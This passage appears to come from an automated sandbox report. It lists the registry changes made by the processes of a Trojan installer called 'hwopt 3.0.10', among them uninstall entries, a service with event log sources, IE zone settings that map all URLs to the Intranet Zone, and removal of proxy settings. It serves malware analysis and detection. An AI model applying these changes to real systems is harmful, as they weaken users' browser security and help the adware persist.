"Seed" = "F6 61 64 50 40 79 05 10 3D 09 84 64 7C 08 97 F0"
The process csc.exe:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 87 E0 36 3A E6 68 43 CE E6 F9 18 A2 CA C0 7B"
The process csc.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 87 17 28 8D 1F 3A 9D 3F 90 07 8E EF 70 B1 09"
The process csc.exe:544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 3B 6A C9 A3 78 4B 96 06 A6 65 46 65 3A 91 F5"
The process csc.exe:2008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 5E 46 39 2E 43 C0 3E 99 71 0C 33 2C 9C BE C1"
The process csc.exe:332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 1E D1 1E 10 9A 45 C2 B0 1E BD E7 4A 8B C9 5C"
The process csc.exe:1752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 8E 48 1E CA 74 C8 72 83 F7 24 0F 2E FD 00 36"
The process csc.exe:1512 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 22 F9 27 A7 C3 F3 60 04 14 0D 8A 19 69 55 FB"
The process 07-04-2016_hwopt_3.0.10-1.tmp:432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\data]
"uninstaller_path" = "C:\Windows\hwopt_12052016001648"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"InstallLocation" = "C:\Windows\hwopt_12052016001648\"
"QuietUninstallString" = "C:\Windows\hwopt_12052016001648\unins000.exe /SILENT"
"DisplayVersion" = "3.0.10"
"Inno Setup: Icon Group" = "hwopt"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\is-U38O7.tmp]
"EditBinx86.exe" = "EditBin"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"NoRepair" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"MajorVersion" = "3"
"NoModify" = "1"
[HKLM\SOFTWARE]
"hwopt" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"UninstallString" = "C:\Windows\hwopt_12052016001648\unins000.exe"
"Inno Setup: User" = "%CurrentUserName%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"InstallDate" = "20160512"
"Publisher" = "hwopt"
"URLInfoAbout" = "http://genisys.online"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Windows\hwopt_12052016001648]
"InstallationStatsUploder_12052016001648.exe" = "InstallationStatsUploder"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"HelpLink" = "http://genisys.online"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\is-U38O7.tmp]
"fileman.exe" = "fileman"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Windows\hwopt_12052016001648]
"InstallUtil.exe" = ".NET Framework installation utility"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"MinorVersion" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C CF FC 37 BB 97 83 33 92 21 38 9F B3 E1 79 41"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"Inno Setup: Language" = "english"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"sc.exe" = "A tool to aid in developing services for WindowsNT"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"URLUpdateInfo" = "http://genisys.online"
"DisplayName" = "hwopt 3.0.10"
"Inno Setup: Setup Version" = "5.5.5 (a)"
"Inno Setup: App Path" = "C:\Windows\hwopt_12052016001648"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The process MSIF2.tmp:3740 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B9 C2 FD 5A 70 39 17 49 81 4A 27 63 DF D1 78 B5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Call 2 Customer LLC\YouTube Downloader]
"YouTubeManager.exe" = "YouTubeManager"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process netsh.exe:652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF D6 36 A2 C8 AE D8 5E E2 A0 73 28 5D CC B5 A4"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The process netsh.exe:2084 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 4D BC E1 03 E4 7F 62 53 7A 4B 7C 3E 11 6B 85"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
The process InstallUtil.exe:1744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 EB 62 C2 14 C6 CE D3 83 EA EB 7F F2 0C 05 D7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\hwopt12052016001648]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application]
"Sources" = "WSH, WMIAdapter, WMI.NET Provider Extension, WmdmPmSN, WinMgmt, Winlogon, Windows Product Activation, Windows 3.1 Migration, WebClient, VSSetup, VSS, vmtools, vmStatsProvider, VBRuntime, Userinit, Userenv, TPVCGateway, Tlntsvr, System.ServiceModel.Install 3.0.0.0, System.ServiceModel 4.0.0.0, System.ServiceModel 3.0.0.0, System.Runtime.Serialization 4.0.0.0, System.Runtime.Serialization 3.0.0.0, System.IO.Log 4.0.0.0, System.IO.Log 3.0.0.0, System.IdentityModel 4.0.0.0, System.IdentityModel 3.0.0.0, SysmonLog, Starter, SpoolerCtrs, Software Restriction Policies, Software Installation, ServiceModel Audit 4.0.0.0, ServiceModel Audit 3.0.0.0, SecurityCenter, SclgNtfy, SceSrv, SceCli, safrslv, SAFrdms, RPC, Remote Assistance, PerlMsg, PerfProc, PerfOS, PerfNet, Perfmon, Perflib, PerfDisk, Perfctrs, Offline Files, Oakley, ntbackup, MSSQLSERVER/MSDE, MSSHA, MsiInstaller, MSDTC Client, MSDTC, mnmsrvc, Microsoft.Transactions.Bridge 4.0.0.0, Microsoft.Transactions.Bridge 3.0.0.0, Microsoft H.323 Telephony Service Provider, Microsoft (R) Visual C# 2005 Compiler, LoadPerf, JavaQuick&"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallUtil.exe:2024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 EB 1C CA 60 F2 F5 EA 3D 0B E7 9D 6D E1 B7 8E"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\hwopt12052016001648_updater_service]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application]
"Sources" = "hwopt12052016001648, WSH, WMIAdapter, WMI.NET Provider Extension, WmdmPmSN, WinMgmt, Winlogon, Windows Product Activation, Windows 3.1 Migration, WebClient, VSSetup, VSS, vmtools, vmStatsProvider, VBRuntime, Userinit, Userenv, TPVCGateway, Tlntsvr, System.ServiceModel.Install 3.0.0.0, System.ServiceModel 4.0.0.0, System.ServiceModel 3.0.0.0, System.Runtime.Serialization 4.0.0.0, System.Runtime.Serialization 3.0.0.0, System.IO.Log 4.0.0.0, System.IO.Log 3.0.0.0, System.IdentityModel 4.0.0.0, System.IdentityModel 3.0.0.0, SysmonLog, Starter, SpoolerCtrs, Software Restriction Policies, Software Installation, ServiceModel Audit 4.0.0.0, ServiceModel Audit 3.0.0.0, SecurityCenter, SclgNtfy, SceSrv, SceCli, safrslv, SAFrdms, RPC, Remote Assistance, PerlMsg, PerfProc, PerfOS, PerfNet, Perfmon, Perflib, PerfDisk, Perfctrs, Offline Files, Oakley, ntbackup, MSSQLSERVER/MSDE, MSSHA, MsiInstaller, MSDTC Client, MSDTC, mnmsrvc, Microsoft.Transactions.Bridge 4.0.0.0, Microsoft.Transactions.Bridge 3.0.0.0, Microsoft H.323 Telephony Service Provider, Microsoft (R) Visual C# 2005 Compile'"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process clicker.exe:2312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 91 5A 54 71 0D B5 48 B1 D8 4B 43 1D 9D B0 AE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process clicker.exe:2452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 60 3D 16 B8 9A 13 85 41 83 7C B0 94 42 FD B6"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE]
"(Default)"
The process sc.exe:716 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD AB 3C 30 DE C0 5C 58 8C 18 47 13 B9 E6 46 56"
The process sc.exe:588 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 54 C9 DA 61 BF 84 13 8A CB 8A 38 B0 01 4C E8"
The process sc.exe:2000 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 7C F8 77 E5 44 32 42 9B 9A 19 FC B7 F9 0E 9C"
The process sc.exe:456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 8D 69 2F 76 1D AC B9 25 4B 9F 92 31 38 A0 6B"
The process sc.exe:504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 F0 4A EA EA 50 F6 55 48 7A E4 C6 20 D1 DD B4"
The process sc.exe:1752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 77 D5 B5 17 60 81 DC C4 93 9C EB ED 46 4C 2A"
The process WindowsXP-KB968930-x86-ENG.exe:3496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "32 AE 65 38 07 6A 3F 2A 99 64 0F 37 8D 48 A2 D5"
The process master.exe:1488 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 DC 1C E4 9D 82 D0 D7 13 D1 7D E9 BC F1 E1 BE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process hwopt12052016001648_updater_service.exe:380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 8C 7D FE BA 0D E1 14 04 09 55 6E 2F 87 83 05"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\NetworkAnalyser[AUTOMATIC_UPDATE_MODULE]]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application]
